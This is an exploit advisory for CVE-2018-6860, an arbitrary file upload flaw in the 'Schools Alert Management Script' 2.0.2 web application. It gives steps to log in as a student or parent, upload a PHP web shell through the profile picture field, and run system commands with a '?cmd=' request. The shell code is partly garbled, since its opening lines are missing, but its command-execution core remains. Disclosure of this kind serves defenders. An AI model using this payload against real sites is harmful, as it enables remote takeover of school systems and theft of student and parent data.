################################################################################################################# # Exploit Title: Schools Alert Management Script - 2.0.2 - Arbitrary File Upload / Remote Code Execution # Date: 07.02.2018 # Vendor Homepage: https://www.phpscriptsmall.com/ # Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/ # Category: Web Application # Exploit Author: Prasenjit Kanti Paul # Web: http://hack2rule.wordpress.com/ # Version: 2.0.2 # Tested on: Linux Mint # CVE: CVE-2018-6860 ################################################################################################################## Proof of Concept ================= 1. Login as Student/Parent 2. Go to "Edit Profile" to upload profile picture. 3. Once you find upload section, upload following code as a PHP file: "; $cmd = ($_REQUEST['cmd']); system($cmd); echo ""; die; } ?> 4. Try to access given PHP file : [site.com]/malicious.php?cmd=ls